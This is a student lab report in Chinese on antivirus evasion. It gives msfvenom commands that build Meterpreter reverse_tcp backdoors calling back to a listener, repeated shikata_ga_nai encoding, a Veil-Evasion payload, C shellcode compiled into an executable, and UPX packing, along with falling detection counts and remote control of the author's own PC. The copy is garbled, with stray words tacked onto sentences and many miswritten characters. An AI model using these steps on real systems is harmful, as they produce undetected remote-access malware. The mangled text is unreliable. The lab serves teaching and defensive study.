Exp3 免杀原理与实践 20154308张珊珊

1、基础问题回答

  • 杀软是如何检测出恶意代码的?
    • 根据特征来检测:恶意代码经常具备明显的特征码也就是一段数据,杀软检测到具备该特征码的程序就看成检测到了恶意代码。
    • 根据行为来检测:若是一个程序的行为是带有恶意的行为,那么这个程序也会被认为是恶意代码,有时候不是恶意代码的程序也会把查杀,由于这些程序作了一些计算机认为不安全的事情,比较常见的就是各自破解补丁或者游戏外挂等。
    • 启发式检测:根据些片面特征去推断。一般是由于缺少精确断定依据。
  • 免杀是作什么?
    • 使恶意软件不被AV检测出来
  • 免杀的基本方法有哪些?
    • 改变特征码
    • 改变行为

二.实践过程

2.1 使用msf生成的后门程序

linux终端:python

msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.30.1.108 LPORT=4308 -f exe > backdoor.exe(linux的ip地址)linux

将生成的后门文件上传到virscan网站扫描,发现有19个软件都能发现
shell

接下来咱们经过改变特征码的方法来实现免杀:windows

  • 编码一次 msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b ‘\x00’ LHOST=172.30.1.108 LPORT=4308 -f exe > backdoor1.exe


然而并无什么用安全

  • 编码十次 msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=172.30.1.108 LPORT=4308 -f exe > backdoor2.exe

能够看出报毒的引擎减小到16个。效果彷佛并无那么明显,根据课上所学,多是由于编码以后老是会有差很少相似的头部来解释如何将文件还原,而杀毒软件恰好就利用这一特征进行杀毒,因此仍是特征码的问题。网络

2.2 使用veil-evasion生成的后门程序

veil-Evasion是一个与Metasploit有点相似的软件,已经在kali虚拟机里,若是没有能够进行在线安装:sudo apt-get install veil-evasiontcp

可是我没有成功,全部接下来的这部分实验是用同窗的电脑完成的学习

在终端下输入指令veil便可打开软件,根据提示依次键入如下指令:网站

use python/meterpreter/rev_tcp //设置payload编码

set LHOST 172.30.6.226 //设置反弹链接IP

set port 4308 //设置反弹端口4308

generate //生成

backdoor3 //程序名

1

生成的文件能够在 其余位置->电脑 里按照它提示的目录找到

检测以后发现报毒软件少了不少,但仍是有。

2.3 C语言调用Shellcode

  • 在Kali里生成一个C语言格式的shellcode

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.75.130 LPORT=4308 -f c

  • 而后我选择在本身的物理机win10上编写一个c文件,就是将讲义中的代码段替换成上面linux生成的代码,并进行编译。(应该在后面运行,以前没截图)(在这个过程当中个人360没有给我任何报警,真是难过)

  • 在linux下进入MSF打开监听进程,跟以前作的实验步骤同样,这时候在win10下运行以前的c文件,这时候linux就轻易的侵入了个人电脑

试一下上次没成功的拍照功能

此次成功了

  • 接下来,咱们找到运行生成的exe文件,送去查杀

只有少数软件报毒,和以前的19个仍是有很明显的对比的。

再送去360看看(专门查杀这个exe文件)

真是一如既往的让人难过,没有任何反应。

2.4 加壳

直接用upx将以前生成的c.exe文件加壳,改个文件名

送去查杀

报毒软件又少了一个。虽然还不太明白加壳是什么意思,可是能看到有一点点免杀的做用。

三. 离实战还缺些什么技术或步骤?

  • 如何将咱们制做的后门程序传到靶机上而且让他运行,钓鱼网站作的应该就是这个事情,虽然我不会。
  • 如何得到一个稳定的ip去监听靶机。

四. 实验总结

  • 此次的实验自己并非特别难,可是我花了很长时间在安装veil这个软件上,最后尚未成功,用了别人的电脑,可是不会气馁,会继续学习。
  • 有一点点小小的遗憾是没有去进一步想各类办法让更少的软件报毒,电脑太卡或者软件装不上等等都是个人借口。
  • 最大的感慨是个人360安全卫士居然如此鸡肋,别人的360或多或少还能察觉一点异样。杀毒软件的薄弱在本次实验中一目了然,因此之后在网络中要“洁身自好”,不轻易点击不明连接,不轻易下载来历不明的第三方软件,定时更新病毒库、查毒、杀毒。
相关文章
相关标签/搜索